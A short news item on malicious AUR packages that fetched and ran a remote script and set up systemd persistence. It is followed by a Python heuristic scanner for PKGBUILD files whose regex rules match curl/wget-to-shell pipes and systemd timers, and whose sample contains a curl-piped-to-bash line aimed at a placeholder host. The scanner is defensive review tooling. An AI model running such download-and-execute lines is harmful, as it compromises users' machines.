Malware found in the Arch Linux AUR repository

Post Syndicated from corbet original https://lwn.net/Articles/759461/rss

Here’s a report in Sensors Tech Forum on the discovery of a set of hostile packages in the Arch Linux AUR repository system. AUR contains user-contributed packages, of course; it’s not a part of the Arch distribution itself. “The security investigation shows that a malicious user with the nickname xeactor modified on June 7 an orphaned package (software without an active maintainer) called acroread. The changes included a curl script that downloads and runs a script from a remote site. This installs a persistent software that reconfigures systemd in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner.” This thread in the aur-general list shows the timeline of the discovery and response.
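
A reviewer can look for the two behaviours the report describes (a download piped into a shell, and systemd changes for periodic start) before building a user-contributed package. The Python sketch below is an added example, not code from the report or from Arch; the rule patterns, the function names and the sample PKGBUILD text are assumptions constructed for illustration.

```python
import re

# Heuristics only: a hit means "read this line", since real packages ship timers too.
SHELL = r"(?:ba|z|da)?sh\b"
RULES = [
    ("download-and-execute",   # curl/wget piped straight into a shell
     re.compile(r"\b(?:curl|wget)\b[^\n|;&]*\|\s*(?:sudo\s+)?" + SHELL)),
    ("download-and-execute",   # bash <(curl ...) or sh -c "$(curl ...)"
     re.compile(r"\b" + SHELL + r"[^\n]*(?:<\(|\$\()\s*(?:curl|wget)\b")),
    ("systemd-persistence",    # enabling units, unit paths, timer files
     re.compile(r"\bsystemctl\s+(?:--\S+\s+)*(?:enable|start)\b|/systemd/system/|\.timer\b")),
]

def logical_lines(text):
    """Yield (first_line_no, text) with backslash continuations joined."""
    buf, start = "", None
    for n, raw in enumerate(text.splitlines(), 1):
        start = start or n
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
            continue
        yield start, buf + raw
        buf, start = "", None
    if buf:
        yield start, buf

def scan(text):
    """Return [(line_no, rule_name)] for non-comment lines matching a rule."""
    hits = []
    for n, line in logical_lines(text):
        if line.lstrip().startswith("#"):
            continue
        for name, rx in RULES:
            if rx.search(line) and (n, name) not in hits:
                hits.append((n, name))
    return hits

# Constructed sample, not the real package; example.invalid is a placeholder.
SAMPLE = """pkgname=example-pkg
# curl https://example.invalid/x | bash   (comment, ignored)
package() {
  curl -s https://example.invalid/stage1 \\
    | bash
  systemctl enable example-refresh.timer
}
"""

if __name__ == "__main__":
    print("\n".join(f"line {n}: {rule}" for n, rule in scan(SAMPLE)))
```

Pattern matching like this is easy to evade with obfuscation, so it complements reading the build script rather than replacing it.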